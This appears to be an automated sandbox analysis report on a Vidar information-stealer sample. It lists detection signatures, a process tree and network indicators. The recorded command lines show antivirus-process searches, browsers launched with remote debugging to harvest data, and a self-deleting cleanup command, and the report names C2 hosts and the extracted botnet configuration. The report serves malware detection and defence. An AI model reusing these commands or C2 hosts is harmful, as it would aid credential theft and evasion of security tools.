Edit tour

Windows Analysis Report
QIo3SytSZA.exe

Overview

General Information

Sample name:	QIo3SytSZA.exe renamed because original name is a hash value
Original sample name:	1f4548aac2c166bacd286c6f5243908f.exe
Analysis ID:	1577887
MD5:	1f4548aac2c166bacd286c6f5243908f
SHA1:	4f1aa4c962860e6c80c626c367ce60b87fc62022
SHA256:	023b8573a4295c5f78f6e89b13062e5c185d74e57d2b1c8ec066393bba87313a
Tags:	exeuser-abuse_ch
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Monitors registry run keys for changes

Performs DNS queries to domains with low reputation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Suspicious Copy From or To System Directory

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

QIo3SytSZA.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\QIo3SytSZA.exe" MD5: 1F4548AAC2C166BACD286C6F5243908F)

cmd.exe (PID: 7640 cmdline: "C:\Windows\System32\cmd.exe" /c copy Adjacent Adjacent.cmd & Adjacent.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7704 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7712 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7760 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7768 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7804 cmdline: cmd /c md 415434 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7820 cmdline: findstr /V "Analyze" Arabic MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7836 cmdline: cmd /c copy /b ..\Reflected + ..\Subdivision + ..\Change + ..\Checked o MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Vibrators.com (PID: 7852 cmdline: Vibrators.com o MD5: 62D09F076E6E0240548C2F837536A46A)

chrome.exe (PID: 7296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 1796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1988,i,7571485263199981070,11501263835013036309,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 1172 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3688 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2812 --field-trial-handle=2520,i,303125913703440342,5402026303497311183,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7948 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2020 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2580 --field-trial-handle=2460,i,15708646645341395724,7971815597723476352,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 4888 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\415434\Vibrators.com" & rd /s /q "C:\ProgramData\WBIEKNG4E3WB" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7720 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

choice.exe (PID: 7892 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

msedge.exe (PID: 6916 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5744 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2044,i,15636258417430532003,11558248929672306327,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3684 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 4108 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6964 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5636 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2092 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6596 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000B.00000003.1708990346.00000000039BA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000003.1708846807.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000002.2507233828.00000000039B1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000002.2507233828.00000000039B1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2504350523.0000000000F03000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000002.2504350523.0000000000F03000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2504454906.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000002.2504454906.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000003.1708781553.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Vibrators.com PID: 7852	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Vibrators.com PID: 7852	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: Vibrators.com PID: 7852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.Vibrators.com.39b0000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Sigma Signatures

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Vibrators.com o, ParentImage: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com, ParentProcessId: 7852, ParentProcessName: Vibrators.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7296, ProcessName: chrome.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Adjacent Adjacent.cmd & Adjacent.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Adjacent Adjacent.cmd & Adjacent.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\QIo3SytSZA.exe", ParentImage: C:\Users\user\Desktop\QIo3SytSZA.exe, ParentProcessId: 7556, ParentProcessName: QIo3SytSZA.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Adjacent Adjacent.cmd & Adjacent.cmd, ProcessId: 7640, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Adjacent Adjacent.cmd & Adjacent.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7640, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7768, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T21:08:52.059022+0100	2044247	1	Malware Command and Control Activity Detected	94.130.191.168	443	192.168.2.9	49713	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T21:08:54.358044+0100	2051831	1	Malware Command and Control Activity Detected	94.130.191.168	443	192.168.2.9	49714	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T21:08:52.058807+0100	2049087	1	A Network Trojan was detected	192.168.2.9	49713	94.130.191.168	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://hulkpara.xyz/

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000B.00000003.1708990346.00000000039BA000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Multi AV Scanner detection for submitted file

Source: QIo3SytSZA.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.3% probability

Machine Learning detection for sample

Source: QIo3SytSZA.exe

Joe Sandbox ML: detected

Source: QIo3SytSZA.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49817 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.9:49710 version: TLS 1.2

Source: QIo3SytSZA.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A5DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_00A5DC54
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A6A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_00A6A087
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A6A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_00A6A1E2
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A5E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_00A5E472
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A6A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_00A6A570
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A666DC FindFirstFileW,FindNextFileW,FindClose,	11_2_00A666DC
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A2C622 FindFirstFileExW,	11_2_00A2C622
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_00A673D4
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A67333 FindFirstFileW,FindClose,	11_2_00A67333
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A5D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_00A5D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\415434	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\415434\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 38MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.9:49713 -> 94.130.191.168:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.191.168:443 -> 192.168.2.9:49714
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.191.168:443 -> 192.168.2.9:49713

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199809363512

Performs DNS queries to domains with low reputation

Source:

DNS query: hulkpara.xyz

Source: global traffic

HTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 108.139.47.50 108.139.47.50

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

HTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49817 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A6D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

11_2_00A6D889

Source: global traffic	HTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: hulkpara.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIk6HLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIk6HLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1734552576462&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=37276334F0DB6278260F766DF1DC6332&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
